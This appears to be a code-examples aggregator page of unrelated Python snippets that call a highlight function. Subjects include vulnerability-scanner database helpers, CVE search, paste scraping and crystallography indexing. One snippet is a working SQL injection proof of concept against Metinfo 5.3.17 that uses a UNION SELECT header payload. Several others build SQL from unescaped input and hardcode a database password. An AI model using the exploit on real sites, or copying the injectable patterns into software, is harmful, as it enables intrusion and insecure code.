Пример #1
0
def db_insert(table, args):
    """ Insert data into table

        Args:
            table: The name of table
            args: The input content, it is a dict, e.g. {'exclusion':'google','update_time':'2017-03-10: 14:19'}

    """

    cols = []
    for key in args.keys():
        cols.append(key)
    sql = 'INSERT INTO `%s` (%s) VALUES (%s)' % (table, ','.join(
        ['`%s`' % col
         for col in cols]), ','.join(['?' for i in range(len(cols))]))
    sql = sql.replace('?', '%s')
    try:
        db = db_conn()
        cursor = db.cursor()
        cursor.execute(sql, args.values())
        db.commit()
        db.close()
        return True
    except Exception, e:
        print highlight('[!] sql: {}, error: {}'.format(sql, str(e)), 'red')
        return False
Пример #2
0
def db_update(table, args, cons):
    """ Update data in specific table with specific conditions

        Args:
            table: The name of table
            args: The update content, it is a dict, e.g. {'exclusion':'google','update_time':'2017-03-10: 14:19'}
            cons: The conditions, it is a dict, e.g. {'id':'111'}

    """

    cols = []
    cols_cons = []
    values = []
    for k, v in args.items():
        cols.append(k)
        values.append(v)
    for k, v in cons.items():
        cols_cons.append(k)
        values.append(v)
    sql = 'UPDATE `%s` SET %s WHERE %s' % (table, ','.join(
        ['`%s`=?' % col
         for col in cols]), ','.join(['`%s`=?' % col for col in cols_cons]))
    sql = sql.replace('?', '%s')
    try:
        db = db_conn()
        cursor = db.cursor()
        cursor.execute(sql, values)
        db.commit()
        db.close()
        return True
    except Exception, e:
        print highlight('[!] sql: {}, error: {}'.format(sql, str(e)), 'red')
        return False
Пример #3
0
def db_update(table, args, cons):
    """ Update data in specific table with specific conditions

        Args:
            table: The name of table
            args: The update content, it is a dict, e.g. {'exclusion':'google','update_time':'2017-03-10: 14:19'}
            cons: The conditions, it is a dict, e.g. {'id':'111'}

    """

    cols = []
    cols_cons = []
    values = []
    for k,v in args.items():
        cols.append(k)
        values.append(v)
    for k,v in cons.items():
        cols_cons.append(k)
        values.append(v)
    sql = 'UPDATE `%s` SET %s WHERE %s' % (table, ','.join(['`%s`=?' % col for col in cols]), ','.join(['`%s`=?' % col for col in cols_cons]))
    sql = sql.replace('?', '%s')
    try:
        db = db_conn()
        cursor = db.cursor()
        cursor.execute(sql, values)
        db.commit()
        db.close()
        return True
    except Exception, e:
        print highlight('[!] sql: {}, error: {}'.format(sql, str(e)), 'red')
        return False
Пример #4
0
def db_query(sql):
    try:
        db = db_conn()
        cursor = db.cursor()
        cursor.execute(sql)
        db.commit()
        db.close()
        query_result = cursor.fetchall()
        return query_result
    except Exception, e:
        print highlight('[!] sql: {}, error: {}'.format(sql, str(e)), 'red')
        return ''
Пример #5
0
def db_query(sql):
    try:
        db = db_conn()
        cursor = db.cursor()
        cursor.execute(sql)
        db.commit()
        db.close()
        query_result = cursor.fetchall()
        return query_result
    except Exception, e:
        print highlight('[!] sql: {}, error: {}'.format(sql, str(e)), 'red')
        return ''
Пример #6
0
def db_conn():
    try:
        user = "******"
        pwd = "toor"
        hostname = "127.0.0.1"

        dbname = "nagascan"
        charset = "utf8"
        dbconn = MySQLdb.connect(user=user,passwd=pwd,host=hostname,db=dbname,charset=charset)
        return dbconn
    except Exception, e:
        print highlight('[!] error: {}'.format(str(e)), 'yellow')
        pass
Пример #7
0
def search(keyword):
    db = DB(Config.dbOpts)
    sql = 'SELECT * FROM cve WHERE `desc` like "%%%s%%"' % keyword
    ret = db.select(sql)
    for kd in ret:
        print(kd[0])
        print(highlight(kd[1], keyword))
Пример #8
0
def handle_input(thread, inport, q):
    for _ in range(5):
        thread.check_stopped()
        data = readline_from_port(inport)
        logging.info(f'enqueuing {repr(data)}')
        print(highlight(f'I PUT {repr(data)}', YELLOW))
        q.put(data)
Пример #9
0
def search(opts):
    keyword = opts.search
    exclude = opts.exclude
    # excludes = exclude.split(",")
    # exclude = exclude.replace(",", "|")
    # print("exclude %s" % exclude)
    keywords = keyword.split(",")
    if keyword != "raw":
        sql = "SELECT `number`, `desc` FROM cve WHERE"
        for key in keywords:
            sql += '`desc` like "%%%s%%" and' % key
        sql = sql[:-4]
    else:
        sql = input("input your sql here:")
    # print(sql)
    db = DB(Config.dbOpts)
    ret = db.select(sql)
    for kd in ret:
        # for ex in excludes:
        # print(re.search(exclude, kd[1], re.IGNORECASE))
        if len(exclude) > 0 and re.search(exclude.replace(",", "|"), kd[1], re.IGNORECASE) is not None:
            continue
            # if ex in kd[1]:
        if opts.colorful:
            print(colored(kd[0], "yellow"))
            print(highlight(kd[1], keywords))
        else:
            print(kd[0])
            print(kd[1])
    print("\ntotal %d results with keywords: %s" % (len(ret), keyword))
Пример #10
0
def db_conn():
    try:
        user = "******"
        pwd = "toor"
        hostname = "127.0.0.1"

        dbname = "nagascan"
        charset = "utf8"
        dbconn = MySQLdb.connect(user=user,
                                 passwd=pwd,
                                 host=hostname,
                                 db=dbname,
                                 charset=charset)
        return dbconn
    except Exception, e:
        print highlight('[!] error: {}'.format(str(e)), 'yellow')
        pass
Пример #11
0
 def package_dependencies(self):
     lock_file_path = os.path.join(self.packrat_path, 'packrat.lock')
     if os.path.exists(lock_file_path):
         with open(lock_file_path) as f:
             lock_file_contents = f.read()
             return utils.highlight(lock_file_contents, TextLexer())
     else:
         return "No packrat.lock file found"
Пример #12
0
 def package_dependencies(self):
     lock_file_path = os.path.join(self.packrat_path, 'packrat.lock')
     if os.path.exists(lock_file_path):
         with open(lock_file_path) as f:
             lock_file_contents = f.read()
         highlighted_lock_file_contents = utils.highlight(lock_file_contents,
                                                          TextLexer())
     else:
         highlighted_lock_file_contents = "<p>No lock file</p>"
     return highlighted_lock_file_contents
Пример #13
0
def main():
  st.markdown("<h1 style='text-align: center; color: rgb(246, 51, 102);'>trackHN</h1>", unsafe_allow_html=True)	
  st.markdown("<p style='text-align: center;'>track HackerNews, with sense</p>",unsafe_allow_html=True)
  keyword = st.text_input("search keyword")
  context = st.text_area("sample text")
  st.write("give text having keyword in the needed context")
  search = st.button("go")



  if search:
    #check if keyword in sample text
    if(re.search(r'\b'+keyword+r'\b',context,flags=re.IGNORECASE)):
      model,tokenizer = load_model()
      #gets embedding for the keyword
      context_embed = word_embed(context, keyword, model, tokenizer)
      
      
      with st.spinner('searching...'):
        base_url = 'https://hacker-news.firebaseio.com/v0/' 
        end_url = '.json?print=pretty'
        ids_url = ''.join([base_url,category,'stories',end_url])
        #gets ids of 500 posts             
        ids = requests.get(ids_url) 
        for id in ids.json():
          url = ''.join([base_url,'item/',str(id),end_url])
          r = requests.get(url).json()
          if (r):
            if 'url' in r.keys():
              link = r['url']
              title = r['title']
              match = (re.search(r'\b'+keyword+r'\b',title,flags=re.IGNORECASE))
              if match:
                index = match.start() 
                #gets embedding for keyword in search result                                          
                title_embed = word_embed(title,keyword,model, tokenizer)        
                similarity=(1-cosine(context_embed,title_embed))
                if (similarity>threshold):
                  before = title[:index]
                  key = title[index:index+len(keyword)]
                  after = title[index+len(keyword):]
                  #calculate the intensity of keyword highlighting
                  h,s,l=highlight(similarity)                                   
                  
                  
                  #formatting output text                                
                  st.markdown("<style>.before{background-color:0;margin:0; display:inline;}</style>",unsafe_allow_html=True)
                  st.markdown("<style>.after{background-color:0;margin:0; display:inline;}</style>",unsafe_allow_html=True)
                  first = "<div><p class=before>{}</p><a style = 'background-color:".format(before)
                  st.markdown(first+"hsl({},{}%,{}%);'>{}</a><p class=after>{}</p></div>".format(h,s,l,key,after), unsafe_allow_html=True)
                  st.markdown("<a href={}>read more</a>".format(link),unsafe_allow_html=True)
    
    
    else:
      st.write('keyword missing in text')
Пример #14
0
def do_search(search, offset, nr_results=None):
    # look through database return limit number of pastes, print them
    if search is None:
        search = ""
    bool_search = search
    if nr_results is None:
        cursor.execute(
            """SELECT COUNT(*) FROM identifier WHERE category=%(search)s""",
            {'search': bool_search})
        nr_results = cursor.fetchall()[0][0]
        print html_escape(cursor.statement)
    sql_offset = offset * SC_PER_PAGE
    cursor.execute(
        """SELECT * FROM identifier INNER JOIN scrape ON identifier.scrape_id = scrape.id WHERE category=%(search)s ORDER by scrape_id DESC LIMIT %(sql_offset)s, %(SC_PER_PAGE)s""",
        {
            'search': bool_search,
            'sql_offset': sql_offset,
            'SC_PER_PAGE': SC_PER_PAGE
        })
    print html_escape(cursor.statement)
    result = cursor.fetchall()
    add_top_part(nr_results, offset, search)
    if nr_results == 0:
        return
    html = """<div class="container">"""
    html += """<table cellpadding="0" cellspacing="0" border="0" class="datatable table table-striped table-bordered" id="results">
    <thead>
    <tr>
        <th>Title</th>
        <th onclick="sortTableNumber(1)">Creation Date</th>
        <th> Raw Preview</th>
    </tr></thead>"""
    for (id1, scrape_id, category, nr_of_results, id2, scrape_url, full_url,
         date, paste_key, size, expire, title, syntax, raw) in result:
        if title == "":
            title = "Untitled"
        html += "<tr>\n"
        html += """<td> <a href="/cgi-bin/paste_inspection.py?id=%s" target="_blank">%s</a> </td>\n""" % (
            id2, title.encode('utf-8'))
        html += "<td data-ts=%s> %s </td>\n" % (
            int(date), datetime.datetime.fromtimestamp(
                int(date)).strftime('%d-%m-%Y %H:%M:%S'))
        raw1, raw2 = highlight(html_escape(raw.encode('utf-8')),
                               "",
                               identifier=search)
        if raw2 is not None:
            html += """<td> <p>%s</p> <p>%s</p> </td>\n""" % (raw1, raw2)
        else:
            html += """<td> <p>%s</p></td>\n""" % raw1
        html += "</tr>\n"
    html += "</table>\n"
    html += "</div>"
    print html
    add_bottom_part(search, offset, nr_results)
    print """<footer class="footer"> <div class="jumbotron text-center" style="margin-bottom:0">
Пример #15
0
def handle_output(thread, q):
    while True:
        thread.check_stopped()
        data = q.get()
        if data is None:
            return
        logging.info(f'received {repr(data)}')
        logging.info(f'performing complicated algorithm on {repr(data)}')
        time.sleep(3)
        print(highlight(f'YOU GOT {data or "nothing"}', GREEN))
        q.task_done()
Пример #16
0
def is_checked_vulnerable(rid, scan_result_type):
    """Check if the specific request has been detected as vulnerable before.

    Args:
        rid: The rid of the request
        scan_result_type: The scan result type for the request, e.g. result_xss, result_sqli

    Returns:
        True for existed vulnerable, False otherwise.

    """

    try:
        sql = "SELECT COUNT(*) FROM requests where rid ='{}' and {} = 'vulnerable'".format(rid.strip(), scan_result_type)
        query_result = db_query(sql)
        count = [row[0] for row in query_result]
        if count[0] >= 1:
            return True
        else:
            return False
    except Exception, e:
        print highlight('[!] {}'.format(str(e)), 'red')
        return False
Пример #17
0
def is_checked(rid, scan_type):
    """Check if the specific request has been checked before.

    Args:
        rid: The rid of the request
        scan_type: The scan type, e.g. scan_xss, scan_sqli

    Returns:
        True for checked, False otherwise.

    """

    try:
        sql = "SELECT COUNT(*) FROM requests where rid ='{}' and {} = 1".format(rid.strip(), scan_type)
        query_result = db_query(sql)
        count = [row[0] for row in query_result]
        if count[0] >= 1:
            return True
        else:
            return False
    except Exception, e:
        print highlight('[!] {}'.format(str(e)), 'red')
        return False
Пример #18
0
def db_insert(table, args):
    """ Insert data into table

        Args:
            table: The name of table
            args: The input content, it is a dict, e.g. {'exclusion':'google','update_time':'2017-03-10: 14:19'}

    """

    cols = []
    for key in args.keys():
        cols.append(key)
    sql = 'INSERT INTO `%s` (%s) VALUES (%s)' % (table, ','.join(['`%s`' % col for col in cols]), ','.join(['?' for i in range(len(cols))]))
    sql = sql.replace('?', '%s')
    try:
        db = db_conn()
        cursor = db.cursor()
        cursor.execute(sql, args.values())
        db.commit()
        db.close()
        return True
    except Exception, e:
        print highlight('[!] sql: {}, error: {}'.format(sql, str(e)), 'red')
        return False
Пример #19
0
def is_checked(rid, scan_type):
    """Check if the specific request has been checked before.

    Args:
        rid: The rid of the request
        scan_type: The scan type, e.g. scan_xss, scan_sqli

    Returns:
        True for checked, False otherwise.

    """

    try:
        sql = "SELECT COUNT(*) FROM requests where rid ='{}' and {} = 1".format(
            rid.strip(), scan_type)
        query_result = db_query(sql)
        count = [row[0] for row in query_result]
        if count[0] >= 1:
            return True
        else:
            return False
    except Exception, e:
        print highlight('[!] {}'.format(str(e)), 'red')
        return False
    def verify(self, first=False):
        # 漏洞验证方法(mode=verify)
        target = self.scan_info.get("Target", "")    # 获取测试目标
        verbose = self.scan_info.get("Verbose", False)   # 是否打印详细信息

        # 以下是PoC的检测逻辑
        url = urljoin(target,'index.php?lang=Cn&index=1')
        payload = "1/2/zxxza' union select 1,2,3,md5(0x11),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#/index.php"
        headers = {
            "X-Rewrite-Url": payload
        }

        location = ""
        # 使用req做HTTP请求的发送和响应的处理,req是TCC框架将requests的HTTP请求方法封装成统一的req函数,使用req(url, method, **kwargs),参数传递同requests
        resp = req(url, 'get', headers=headers, allow_redirects=False)
        if resp is not None:
            location = resp.headers.get("Location", "")

        if "47ed733b8d10be225eceba344d533586" in location:
            self.scan_info['Success'] = True    # 漏洞存在,必须将该字段更新为True(必须)
            self.scan_info['Ret']['VerifyInfo']['URL'] = url    # 记录漏洞相关的一些额外信息(可选)
            self.scan_info['Ret']['VerifyInfo']['DATA'] = "X-Rewrite-Url:" + payload
            if verbose:
                highlight('[*] Metinfo 5.3.17 X-Rewrite-url SQL Injection found')    # 打印高亮信息发现漏洞,其他可用方法包括info()/warn()/error()/highlight()方法分别打印不同等级的信息
Пример #21
0
def is_checked_vulnerable(rid, scan_result_type):
    """Check if the specific request has been detected as vulnerable before.

    Args:
        rid: The rid of the request
        scan_result_type: The scan result type for the request, e.g. result_xss, result_sqli

    Returns:
        True for existed vulnerable, False otherwise.

    """

    try:
        sql = "SELECT COUNT(*) FROM requests where rid ='{}' and {} = 'vulnerable'".format(
            rid.strip(), scan_result_type)
        query_result = db_query(sql)
        count = [row[0] for row in query_result]
        if count[0] >= 1:
            return True
        else:
            return False
    except Exception, e:
        print highlight('[!] {}'.format(str(e)), 'red')
        return False
Пример #22
0
def cc(title: str, authors: str, file):
    with GoogleScholar() as gs:
        # 前往文章搜索页面
        gs.search(title)
        if not gs.search_citations_of_the_1st_result():
            print(Fore.YELLOW + 'No citations found.')
            exit(0)

        # 遍历每一页, total:他引数目, totalnum:全部文章
        page, total, totalnum = 0, 0, 0
        while True:

            page += 1
            print('-' * 10)
            print(Style.BRIGHT + Fore.GREEN + 'Page %d' % page)
            print('-' * 10)

            articles = gs.extract_articles_of_current_page()
            for i, cite in enumerate(articles):
                # valid = is_journal(cite)[0] and is_others(cite, authors)[0]
                valid = is_others(cite, authors)[0]
                cite = highlight(cite, authors)
                total += valid
                totalnum += 1

                message = [
                    Fore.BLUE,
                    Style.BRIGHT, '[%02d] %s\n' % (i + 1, cite.title),
                    Style.NORMAL, '     %s\n' % cite.url,
                    Style.NORMAL, '     %s\n' % cite.authors,
                    Style.NORMAL + Fore.YELLOW + '     %s\n' % cite.citations.get(EXPORT, 'Not Found.'),
                    Style.BRIGHT + Fore.MAGENTA + '     Good.\n' if valid else '',
                ]
                print(''.join(message))
                f.write("引用论文" + str(totalnum) + "\n")
                f.write(cite.citations.get(EXPORT, 'Not Found.') + "\n")
                f.write("引用出处【-】" + "\n")
                f.write("\n")
                f.write("\n")

            # arg = input('Valid citations %d, press ENTER or input NEW count: ' % total)
            # if arg.isdigit():
            #     total = int(arg)
            #     print('Update citations: %d' % total)
            if not gs.goto_next_page():
                break

    return total
 def deployCrystfelGeometry(self, arg):
     self.findPsanaGeometry()
     if self.calibFile is not None and self.parent.writeAccess:
         # Convert psana geometry to crystfel geom
         if '.temp.geom' in self.parent.index.geom:
             self.parent.index.p9.param(self.parent.index.index_grp,
                                        self.parent.index.index_geom_str).setValue(
                 self.parent.psocakeRunDir + '/.temp.geom')
             cmd = ["psana2crystfel", self.calibPath + '/' + self.calibFile,
                    self.parent.psocakeRunDir + "/.temp.geom", str(self.parent.coffset)]
             if self.parent.args.v >= 1: print("cmd: ", cmd)
             try:
                 p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
                 p.communicate()[0]
                 p.stdout.close()
             except:
                 print(highlight("Warning! deployCrystfelGeometry() failed.", 'r', 1))
             # FIXME: Configure crystfel geom file to read in a mask (crystfel 'mask_file=' broken?)
             with open(self.parent.psocakeRunDir + '/.temp.geom', 'r') as f: lines = f.readlines()
             newGeom = []
             for line in lines: # remove commented out lines
                 if '; mask =' in line:
                     newGeom.append(line.split('; ')[-1])
                 elif '; mask_good =' in line:
                     newGeom.append(line.split('; ')[-1])
                 elif '; mask_bad =' in line:
                     newGeom.append(line.split('; ')[-1])
                 elif '; clen =' in line:
                     newGeom.append(line.split('; ')[-1])
                 elif '; photon_energy =' in line:
                     newGeom.append(line.split('; ')[-1])
                 elif '; adu_per_eV =' in line:
                     if 'epix10k' in self.parent.detInfo.lower() or \
                        'jungfrau4m' in self.parent.detInfo.lower():
                         newGeom.append(line.split('; ')[-1].split('0.1')[0]+"0.001") # override
                     else:
                         newGeom.append(line.split('; ')[-1])
                 else:
                     newGeom.append(line)
             with open(self.parent.psocakeRunDir + '/.temp.geom', 'w') as f:
                 f.writelines(newGeom)
     if self.parent.args.v >= 1: print("Done deployCrystfelGeometry")
Пример #24
0
def img_line_detection(img, process):
    """Detect and highlignt lines in an image
    according to a processing class

    Inputs
    ------
    img :       an image
    process :   a processing class

    Output
    ------
    the image in which lines are highlighted
    """

    # Line detection
    temp = process.preprocessing(img)
    temp = process.edge_points_extraction(temp)
    lines = process.line_detection(temp)

    return highlight(img, lines)
Пример #25
0
def search(keyword, exclude):
    # excludes = exclude.split(",")
    # exclude = exclude.replace(",", "|")
    # print("exclude %s" % exclude)
    keywords = keyword.split(",")
    db = DB(Config.dbOpts)
    sql = 'SELECT `number`, `desc` FROM cve WHERE'
    for key in keywords:
        sql += '`desc` like "%%%s%%" and' % key
    sql = sql[:-4]
    # print(sql)
    ret = db.select(sql)
    for kd in ret:
        # for ex in excludes:
        # print(re.search(exclude, kd[1], re.IGNORECASE))
        if len(exclude) > 0 and re.search(exclude.replace(",", "|"), kd[1],
                                          re.IGNORECASE) is not None:
            continue
            # if ex in kd[1]:
        print(colored(kd[0], "yellow"))
        print(highlight(kd[1], keywords))
    print("\ntotal %d results with keywords: %s" % (len(ret), keyword))
Пример #26
0
 def archived_file_contents_highlighted(self):
     contents = self.archived_file_contents()
     lexer = guess_lexer_for_filename(self.path, contents)
     contents_highlighted = utils.highlight(contents, lexer)
     return contents_highlighted
Пример #27
0
def do_search(search, identifier, offset, start, end, order_input, nr_results=None):
    # look through database return limit number of pastes, print them
    if identifier == "none":
        identifier = None
    if start is None:
        start_time = None
    else:
        start_time = to_unix(start)
    if end is None:
        end_time = None
    else:
        end_time = to_unix(end)
    if search is None:
        search = ""
    where = ""
    limit = "%(sql_offset)s, %(SC_PER_PAGE)s"
    if identifier is not None:
        table = "identifier INNER JOIN scrape ON identifier.scrape_id = scrape.id"
        select = "scrape_id, scrape_url, full_url, date, paste_key, size, expire, title, syntax, raw"
        order = get_order("scrape_id", order_input)
        where = add_to_where(where, "category=%(identifier)s")
    else:
        table = "scrape"
        order = get_order("id", order_input)
        select = "*"
    bool_search = "(\"" + search + "\")"
    if identifier is None:
        where = add_to_where(where, "MATCH(raw) AGAINST(%(search)s IN BOOLEAN MODE)")
    else:
        if search != "":
            where = add_to_where(where, "MATCH(raw) AGAINST(%(search)s IN BOOLEAN MODE)")
    tc = time_constraint(start_time, end_time)
    if tc is not None:
        where = add_to_where(where, tc)
    if nr_results is None:
        query = """SELECT COUNT(*) FROM %s WHERE %s""" % (table, where)
        cursor.execute(query,
        {'identifier': identifier, 'search': bool_search, 'start': start_time, 'end': end_time})
        nr_results = cursor.fetchall()[0][0]
    sql_offset = offset * SC_PER_PAGE
    query = """SELECT %s FROM %s WHERE %s ORDER by %s LIMIT %s""" % (select, table, where, order, limit)
    cursor.execute(query, {'identifier': identifier, 'search': bool_search, 'start': start_time, 'end': end_time, 'sql_offset': sql_offset, 'SC_PER_PAGE': SC_PER_PAGE})
    result = cursor.fetchall()
    add_top_part(nr_results, offset, search)
    if nr_results == 0:
        return
    html = """<div class="container">"""
    html += """<table cellpadding="0" cellspacing="0" border="0" class="datatable table table-striped table-bordered" id="results">
    <thead>
    <tr>
        <th>Title</th>
        <th>Creation Date</th>
        <th> Raw Preview</th>
    </tr></thead>"""
    for (id, scrape_url, full_url, date, paste_key, size, expire, title, syntax, raw) in result:
        if title == "":
            title = "Untitled"
        html += "<tr>\n"
        html += """<td> <a href="/cgi-bin/paste_inspection.py?id=%s" target="_blank">%s</a> </td>\n""" % (id, title.encode('utf-8'))
        html += "<td data-ts=%s> %s </td>\n" % (int(date), datetime.datetime.fromtimestamp(int(date)).strftime('%d-%m-%Y %H:%M:%S'))
        raw1, raw2 = highlight(html_escape(raw.encode('utf-8')), html_escape(search), identifier=identifier)
        if raw2 is not None:
            html += """<td> <p>%s</p> <p>%s</p> </td>\n""" % (raw1, raw2)
        else:
            html += """<td> <p>%s</p></td>\n""" % raw1
        html += "</tr>\n"
    html += "</table>\n"
    html += "</div> </div> </div>"
    print html
    add_bottom_part(search, offset, nr_results, start, end, order_input)
    print """<div class="footer"> <div class="jumbotron text-center" style="margin-bottom:0">
Пример #28
0
    def run(self):
        if self.queue is None: # interactive indexing
            # Check if requirements are met for indexing
            if self.parent.pk.numPeaksFound >= self.minPeaks and \
                self.parent.pk.numPeaksFound <= self.maxPeaks and \
                self.parent.pk.peaksMaxRes >= self.minRes:
                print "OK, I'll index this pattern now"

                if self.parent.args.v >= 1: print "Running indexing!!!!!!!!!!!!"
                # Running indexing ...
                self.parent.index.numIndexedPeaksFound = 0
                self.parent.index.indexedPeaks = None
                self.parent.index.clearIndexedPeaks()
                self.parent.index.displayWaiting()

                # Write list of files to index
                with open(self.parent.index.hiddenCrystfelList, "w") as text_file:
                    text_file.write("{} //0".format(self.parent.index.hiddenCXI))

                # Generate a static mask of bad pixels for indexing
                self.parent.mk.saveCheetahStaticMask()

                # FIXME: convert psana geom to crystfel geom
                cmd = "indexamajig -j 1 -i " + self.parent.index.hiddenCrystfelList + " -g " + self.geom + " --peaks=" + self.peakMethod + \
                      " --int-radius=" + self.intRadius + " --indexing=" + self.indexingMethod + \
                      " -o " + self.parent.index.hiddenCrystfelStream + " --temp-dir=" + self.outDir + "/r" + str(
                      self.runNumber).zfill(4) + " --tolerance=" + str(self.tolerance)
                if self.pdb: cmd += " --pdb=" + self.pdb
                if self.extra:
                    _extra = self.extra.replace(",", " ")
                    cmd += " " + _extra

                print "cmd: ", cmd
                process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
                out, err = process.communicate()
                if 'command not found' in err:
                    print "######################################################################"
                    print highlight("FATAL ERROR: I can't find indexamajig on this machine. Refer to:      ",'r',1)
                    print highlight("https://confluence.slac.stanford.edu/display/PSDM/Psocake+SFX+tutorial",'r',1)
                    print "######################################################################"

                mySuccessString = "1 had crystals"
                # Read CrystFEL geometry in stream
                if mySuccessString in err:  # success
                    if self.parent.args.v >= 1: print "Indexing successful!"
                    # print "Munging geometry file"
                    f = open(self.parent.index.hiddenCrystfelStream)
                    content = f.readlines()
                    try:
                        for i, val in enumerate(content):
                            if '----- Begin geometry file -----' in val:
                                startLine = i
                            elif '----- End geometry file -----' in val:
                                endLine = i
                                break
                        geom = content[startLine:endLine]
                        numLines = endLine - startLine
                    except:
                        geom = content[0] # This shouldn't happen
                        numLines = 0
                    # Remove comments
                    for i in np.arange(numLines - 1, -1, -1):  # Start from bottom
                        if ';' in geom[i].lstrip(' ')[0]: geom.pop(i)

                    columns = ['min_fs', 'min_ss', 'max_fs', 'max_ss', 'res', 'fs', 'ss', 'corner_x', 'corner_y']
                    columnsScan = ['fsx', 'fsy', 'ssx', 'ssy']
                    indexScan = []
                    if self.parent.facility == self.parent.facilityLCLS:
                        if 'cspad' in self.parent.detInfo.lower():
                            numQuads = 4
                            numAsics = 16
                            for i in np.arange(numQuads):
                                for j in np.arange(numAsics):
                                    indexScan.append('q' + str(i) + 'a' + str(j))
                        elif 'rayonix' in self.parent.detInfo.lower():
                            numQuads = 1
                            numAsics = 1
                            for i in np.arange(numQuads):
                                    indexScan.append('p' + str(i))
                    elif self.parent.facility == self.parent.facilityPAL:
                        numQuads = 1
                        numAsics = 1
                        for i in np.arange(numQuads):
                            indexScan.append('p' + str(i))

                    dfGeom = pd.DataFrame(np.empty((numQuads * numAsics, len(columns))), index=indexScan,
                                          columns=columns)
                    dfScan = pd.DataFrame(np.empty((numQuads * numAsics, len(columnsScan))), index=indexScan,
                                          columns=columnsScan)
                    counter = 0
                    for i in np.arange(numQuads):
                        for j in np.arange(numAsics):
                            myAsic = indexScan[counter]
                            for k in columns:
                                myLine = [s for s in geom if myAsic + '/' + k in s]
                                if myLine:  # sometimes elements in columns can be missing
                                    myVal = myLine[-1].split('=')[-1].rstrip().lstrip()
                                    if k == 'fs' or k == 'ss':
                                        dfGeom.loc[myAsic, k] = myVal
                                    else:
                                        dfGeom.loc[myAsic, k] = float(myVal)
                                    if k == 'fs':
                                        fsx = float(myVal.split('x')[0])
                                        fsy = float(myVal.split('x')[-1].split('y')[0])
                                        dfScan.loc[myAsic, 'fsx'] = fsx
                                        dfScan.loc[myAsic, 'fsy'] = fsy
                                    elif k == 'ss':
                                        ssx = float(myVal.split('x')[0])
                                        ssy = float(myVal.split('x')[-1].split('y')[0])
                                        dfScan.loc[myAsic, 'ssx'] = ssx
                                        dfScan.loc[myAsic, 'ssy'] = ssy
                                else:
                                    if self.parent.args.v >= 1: print myAsic + '/' + k + " doesn't exist"
                            counter += 1
                    f.close()
                else:
                    if self.parent.args.v >= 1: print "Indexing failed"
                    self.parent.index.drawIndexedPeaks()

                # Read CrystFEL indexed peaks
                if mySuccessString in err:  # success
                    f = open(self.parent.index.hiddenCrystfelStream)
                    content = f.readlines()
                    for i, val in enumerate(content):
                        if 'End of peak list' in val:
                            endLine = i-1
                        elif 'num_saturated_peaks =' in val:
                            self.numSaturatedPeaks = int(val.split('=')[-1])
                        elif 'lattice_type =' in val:
                            self.latticeType = val.split('=')[-1]
                        elif 'centering =' in val:
                            self.centering = val.split('=')[-1]
                        elif 'unique_axis =' in val:
                            self.uniqueAxis = val.split('=')[-1]
                        elif 'fs/px   ss/px (1/d)/nm^-1   Intensity  Panel' in val:
                            startLine = i + 1
                        elif 'Cell parameters' in val:
                            (_, _, a, b, c, _, al, be, ga, _) = val.split()
                            self.unitCell = (a, b, c, al, be, ga)
                        elif 'diffraction_resolution_limit =' in val:
                            (_, _, _, _, _, resLim, _) = val.split() # Angstrom
                        elif 'End of reflections' in val:
                            endReflectionLine = i-1
                        elif '   h    k    l          I   sigma(I)       peak background  fs/px  ss/px panel' in val:
                            startReflectionLine = i+1
                    numPeaks = endLine-startLine
                    numReflections = endReflectionLine-startReflectionLine

                    columns = ['fs', 'ss', 'res', 'intensity', 'asic']
                    peaks = content[startLine:endLine + 1]
                    myPeaks = []
                    for line in peaks:
                        myPeaks.append(line.split())
                    df = pd.DataFrame(myPeaks, columns=columns, dtype=float)
                    if numReflections > 0:
                        columns = ['h', 'k', 'l', 'I', 'sigma', 'peak', 'background', 'fs', 'ss', 'panel']
                        reflections = content[startReflectionLine:endReflectionLine + 1]
                        myReflections = []
                        for line in reflections:
                            myReflections.append(line.split())
                        dfRefl = pd.DataFrame(myReflections, columns=columns, dtype=float)
                    f.close()

                    # Convert predicted spots to CrystFEL coordinates
                    if self.parent.facility == self.parent.facilityLCLS:
                        columnsPeaks = ['x', 'y', 'psocakeX', 'psocakeY']
                        dfPeaks = pd.DataFrame(np.empty((numReflections, len(columnsPeaks))), columns=columnsPeaks)
                        for i in np.arange(numReflections):
                            myAsic = dfRefl['panel'][i].strip()
                            x = (dfRefl['fs'][i] - dfGeom.loc[myAsic, 'min_fs']) * dfScan.loc[myAsic, 'fsx'] + \
                                (dfRefl['ss'][i] - dfGeom.loc[myAsic, 'min_ss']) * dfScan.loc[myAsic, 'ssx']
                            x += dfGeom.loc[myAsic, 'corner_x']
                            y = (dfRefl['fs'][i] - dfGeom.loc[myAsic, 'min_fs']) * dfScan.loc[myAsic, 'fsy'] + \
                                (dfRefl['ss'][i] - dfGeom.loc[myAsic, 'min_ss']) * dfScan.loc[myAsic, 'ssy']
                            y += dfGeom.loc[myAsic, 'corner_y']
                            dfPeaks['x'][i] = x
                            dfPeaks['y'][i] = y
                        # Convert to psocake coordinates
                        for i in np.arange(numReflections):
                            dfPeaks['psocakeX'][i] = self.parent.cx - dfPeaks['x'][i]
                            dfPeaks['psocakeY'][i] = self.parent.cy + dfPeaks['y'][i]
                    elif self.parent.facility == self.parent.facilityPAL:
                        columnsPeaks = ['x', 'y', 'psocakeX', 'psocakeY']
                        dfPeaks = pd.DataFrame(np.empty((numReflections, len(columnsPeaks))), columns=columnsPeaks)
                        # Convert to psocake coordinates
                        for i in np.arange(numReflections):
                            dfPeaks['psocakeX'][i] = dfRefl['ss'][i]
                            dfPeaks['psocakeY'][i] = dfRefl['fs'][i]
                    if self.parent.index.showIndexedPeaks and self.eventNumber == self.parent.eventNumber:
                        self.parent.index.numIndexedPeaksFound = numReflections
                        self.parent.index.indexedPeaks = dfPeaks[['psocakeX', 'psocakeY']].as_matrix()
                        self.parent.index.drawIndexedPeaks(self.latticeType, self.centering, self.unitCell) #FIXME: segfaults when indexing twice
                        try:
                            print "####################"
                            print "lattice_type = ", str(self.latticeType.strip())
                            print "centering = ", str(self.centering.strip())
                            print "unique_axis = ", str(self.uniqueAxis.strip())
                            print "a = ", str(round(float(self.unitCell[0])*10, 2)), " A"
                            print "b = ", str(round(float(self.unitCell[1])*10, 2)), " A"
                            print "c = ", str(round(float(self.unitCell[2])*10, 2)), " A"
                            print "al = ", str(round(float(self.unitCell[3]), 2)), " deg"
                            print "be = ", str(round(float(self.unitCell[4]), 2)), " deg"
